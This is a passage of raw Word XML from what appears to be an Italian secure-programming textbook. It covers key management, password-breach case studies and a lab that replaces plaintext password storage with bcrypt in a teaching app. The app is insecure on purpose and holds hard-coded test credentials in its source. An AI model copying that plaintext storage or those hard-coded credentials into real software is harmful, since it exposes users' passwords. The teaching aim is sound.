        <w:t xml:space="preserve">(testo_chiaro)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># b'4111-1111-1111-1111'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attenzione: la chiave.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tutta la sicurezza si sposta sulla protezione della chiave. La chiave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non va nel codice sorgente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(mai!), non va nel database insieme ai dati cifrati, non va nei log. Va in:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Variabili d’ambiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del sistema operativo (lettura tramite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.environ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vault dedicati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, Google Secret Manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HSM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Hardware Security Module) per applicazioni a sicurezza estremamente alta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trattazione completa della gestione delle chiavi è materia di moduli avanzati. Per il primo anno, ricordati:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la chiave non sta mai nel codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="329"/>
    <w:bookmarkStart w:id="334" w:name="casi-reali-cosa-è-andato-storto"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="534" w:name="sec_7_9"/>
      <w:r>
        <w:t xml:space="preserve">7.9 Casi reali: cosa è andato storto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vediamo brevemente quattro disastri storici, tutti dovuti a errori del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="330" w:name="linkedin-2012-sha-1-senza-salt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LinkedIn 2012 — SHA-1 senza salt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">117 milioni di password rubate, hashate con SHA-1 senza salt. Risultato: in pochi giorni, l’85% delle password è stato decifrato. Le password sono finite in dump pubblici e hanno alimentato anni di credential stuffing su altri siti. Non a caso, dal 2013 in poi, LinkedIn raccomanda l’autenticazione a due fattori (2FA) — meglio tardi che mai.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="330"/>
    <w:bookmarkStart w:id="331" w:name="adobe-2013-cifratura-invece-di-hashing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adobe 2013 — Cifratura invece di hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">153 milioni di account. Adobe usava 3DES (cifratura) invece di hashing. La chiave era recuperabile dal sistema. Risultato: tutte le password decifrate. Aggravante: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">suggerimento password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(memo opzionale) era memorizzato in chiaro accanto. Quando le password sono state pubblicate, il suggerimento le rendeva indovinabili anche senza decifrare l’algoritmo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="331"/>
    <w:bookmarkStart w:id="332" w:name="yahoo-2013-2014-md5-unsalted"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yahoo 2013-2014 — MD5 unsalted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 miliardi di account (l’intero parco utenti Yahoo) compromessi nei due breach del 2013 e 2014. Le password erano hashate con MD5 senza salt. Yahoo ha rivelato il breach solo nel 2016 (gravissimo ritardo di notifica, oggi sarebbe sanzionato dal GDPR).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="332"/>
    <w:bookmarkStart w:id="333" w:name="ashley-madison-2015-bcrypt-usato-male"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ashley Madison 2015 — bcrypt usato male</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ashley Madison era un sito di incontri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">discreti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando hanno rubato il database, le password sembravano sicure: hashate con bcrypt. Buon punto. Ma c’era un errore: per ragioni di performance, gli ingegneri avevano salvato in parallelo anche un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hash MD5 più veloce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della stessa password.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tutte le password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono state cracckate dall’MD5 in pochi giorni. La presenza di una singola debolezza ha vanificato la difesa principale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mai introdurre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scorciatoie veloci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su dati che dovrebbero essere protetti. Un singolo hash debole annulla la protezione di quello forte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="333"/>
    <w:bookmarkEnd w:id="334"/>
    <w:bookmarkStart w:id="341" w:name="Xd66de242f81adc0d90de673ade1d5f8f5a964c7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="535" w:name="sec_7_10"/>
      <w:r>
        <w:t xml:space="preserve">7.10 Laboratorio: hashare bene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ricordi? Le password degli utenti sono salvate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">in chiaro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel database (l’abbiamo visto nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti_test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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Sup3rS3gret0!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin"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"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1500.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Disastroso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Apri DB Browser for SQLite (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vai sulla tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedi le password in chiaro. Se qualcuno copia questo file, ha tutto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="335" w:name="step-1-aggiungiamo-bcrypt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Aggiungiamo bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installa bcrypt (con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attivo):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install bcrypt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="335"/>
    <w:bookmarkStart w:id="336" w:name="step-2-modifichiamo-lapp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Modifichiamo l’app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aggiungi in cima all’import:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">init_db()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per hashare le password al momento della creazione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> init_db():</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cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE IF NOT EXISTS utenti (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            username TEXT UNIQUE NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            password TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            ruolo TEXT NOT NULL DEFAULT 'cliente',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            saldo REAL DEFAULT 0.0</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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ... (resto invariato per prodotti e fatture)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Utenti di test (con password hashate)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utenti_test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Sup3rS3gret0!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin"</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"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1500.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia2025"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8200.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"luca"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"passwordLuca!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">320.75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username, pwd, ruolo, saldo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti_test:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        hash_pwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(pwd.encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 bcrypt.gensalt(rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)).decode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT OR IGNORE INTO utenti (username, password, ruolo, saldo) "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
